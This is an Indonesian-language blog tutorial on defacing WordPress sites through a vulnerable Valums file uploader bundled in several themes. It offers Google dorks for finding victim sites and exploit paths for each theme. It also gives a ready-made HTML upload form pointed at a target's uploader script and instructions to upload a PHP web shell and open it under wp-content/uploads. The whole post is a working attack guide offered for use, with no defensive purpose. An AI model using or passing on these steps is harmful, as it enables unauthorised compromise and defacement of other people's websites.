Tutorial Deface WordPress Valums Uploader Shell Upload

Tutorial Deface WordPress Valums Uploader Shell Upload

11:04 AM
Deface WordPress Valums Uploader Shell Upload
Hy sobat
Kembali lagi dengan saya Handsomeware , Sudah pasti wajah saya Handsome :v
Kali ini saya mau menshare Tutorial Deface WordPress Valums Uploader Shell Upload

Langsung Aja ya :
Dorknya ada banyak tapi kalo mau yang vuln kembangin lagi ya
1. Dork: inurl:/wp-content/themes/nuance/

exploit:
/functions/jwpanel/scripts/valums_uploader/php.php

2. Dork: inurl:/wp-content/themes/lightspeed/

exploit:
/framework/_scripts/valums_uploader/php.php

3. Dork: inurl:/wp-content/themes/saico/

exploit:
/framework/_scripts/valums_uploader/php.php


Setelah dapat target , vulnya kalo ada tulisan {"error":"No files were uploaded.",

Kemudian Buat csrfnya , extensi .html
<form enctype="multipart/form-data"action=" http://target.com/wp-content/themes/eptonic/functions/jwpanel/scripts/valums_uploader/php.php" method="post"><input type="jpg" name="url" value="./" /><br />Please choose a file: <input name="qqfile" type="file" /><br /><input type="submit" value="upload" /></form>

Kalimat bertulisan merah kalian ganti dengan themes exploit targetnya

Setelah itu upload shellnya , extensi .php , kalo gk bisa silahkan di bypass yo
Shell Akses file:
Target.com/wp-content/uploads/tahun/bulan/namashell.php
Sekian dan terimakasih
Handsomeware

Saya adalah Handsomeware , inisial saya di dunia blogging dan dunia cyber.

Next
« Prev Post
Previous
Next Post »
Subscribe to: Post Comments (Atom)